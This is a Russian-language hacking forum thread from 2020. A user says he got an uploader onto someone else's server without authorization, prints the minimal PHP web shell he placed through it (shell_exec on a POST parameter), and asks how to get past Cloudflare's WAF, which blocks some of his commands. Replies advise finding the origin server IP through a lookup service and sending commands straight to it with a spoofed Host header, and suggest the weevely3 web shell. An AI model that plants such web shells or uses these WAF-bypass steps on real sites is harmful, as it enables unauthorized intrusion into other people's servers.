RDot

RDot (https://rdot.org/forum/index.php)
-   Web-среда/Web-applications (https://rdot.org/forum/forumdisplay.php?f=9)
-   -   Прошу помощи с обходом Cloudflare (https://rdot.org/forum/showthread.php?t=4967)

who 11.02.2020 23:25

Прошу помощи с обходом Cloudflare
 
Доброго времени суток.
Ситуация следующая - окольными путям залил шелл и загрузчик. Его (шелл) снесли, но остался загрузчик. Через загрузчик удалось залить обычный консольный скрипт:
Код:

<?php
if (!empty($_POST['cmd'])) {
    $cmd = shell_exec($_POST['cmd']);
}
?>

Грузятся и обычные скрипты, но при любом взаимодействии с ними натыкаюсь на https://ibb.co/DLH81Wr
Обычные команды вида: ls , whoami - работают и отдают данные.
Однако ls -la уже не работает и выдаёт блокировку.
Вопросы в следующем:
Как обойти данную ошибку? Есть ли варианты web-shell для таких ситуаций? Или хотя бы вариант использования стандартных комманд?
Особыми техническими навыками не обладаю, а посему надеюсь на помощь знающих ребят.
Заранее благодарю за ответ.

Consistent 12.03.2020 11:00

Ищи реальный ip сервера, например можешь пробить тут
http://crimeflare.org:82/cfs.html
waf cloudflare блочит запросы.
Потом работай с ip как с обычным доменом, только в хедере host укажи атакуемый домен.
(если ты с винды, то в файле $:\Windows\System32\drivers\etc\hosts назначь "сайт ip")
Будет
https://127.786.986.111/script?cmd=ls%20-la
Вообще гугли cloudflare bypass, методов много.

b3 15.08.2020 15:26

https://github.com/epinna/weevely3 попробуйте


Часовой пояс GMT +3, время: 09:03.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot